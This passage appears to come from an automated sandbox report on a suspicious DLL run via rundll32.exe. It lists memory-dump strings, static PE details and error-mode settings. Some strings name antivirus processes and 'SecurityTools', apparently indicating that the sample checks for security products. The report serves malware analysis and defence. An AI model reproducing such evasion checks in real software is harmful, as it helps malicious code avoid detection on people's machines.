    Source: Binary string: rpcrt4.pdbternetSecurity source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ile":"kernelbase.pdbL source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdbcurityTools$ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sideload.pdbM Win32_Fan source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcp_win.pdbor source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wbemprox.pdbr.exessName source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: cryptbase.pdburityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sechost.pdbEeInfo[ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 0000000D.00000002.3521988705.0000025BF00D3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012096904.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640548536.0000025BF0145000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561249504.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: shcore.pdbedrSizenfo0cf source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: K7RTScan.exeadvapi32.pdb$M4 source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: kernel32.pdbrnetSecurity source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fwpuclnt.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"R source: rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.dll67b6bcd000","debug_file":"oleaut32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\msvcp_win.dll","arch" source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rasadhlp.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: "secur32.pdb"},{"type":"symbolic","name":"C:\\Windows\\SYSTEM32\\CRYPTBASE.DLL","arch":null,"image_addr":"0x7ffd source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.dll9cd10f033ef5-1","code_id":"ce95420b156000","debug_file":"crypt32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\bcrypt.dll","arch":null,"image_addr":"0x7ffdb23N4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: gdi32.pdb/SecurityToolsd source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.pdbols source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: nsi.pdb2% source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"x source: rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: combase.pdbto ServerR source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: psapi.pdbexe[ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: user32.pdbSecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msctf.pdb/SecurityToolsy source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdbute source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: iphlpapi.pdbrityupport$ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ISATRAY.exews2_32.pdb"}, source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdbrrorCodeO source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: UxTheme.pdbSecurityodee source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnsapi.pdbedlogy source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"i source: rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 67b6bcd000","debug_file":"oleaut32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\msvcp_win.dll","arch" source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Nvcoas.exemagehlp.pdb"},jM source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: fwpuclnt.pdbcurityToolsj source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"p source: rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bug_file":"combase.pdb"},{"type":"symbolic",] source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ore.pdb" source: rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: oleaut32.pdbeExtensions source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: _id":"28e89a43c000","debug_file":"cryptbase.pdb"},{"type4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: combase.pdbto ServerRsx source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: 8N8j6QojHn.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: 8N8j6QojHn.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: 8N8j6QojHn.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: 8N8j6QojHn.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: 8N8j6QojHn.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: 8N8j6QojHn.dll Static PE information: real checksum: 0x37a4bb should be: 0x381d51
    Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00007FFD943A3C31 push 314C2960h; ret 6_2_00007FFD943A3C36
    Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
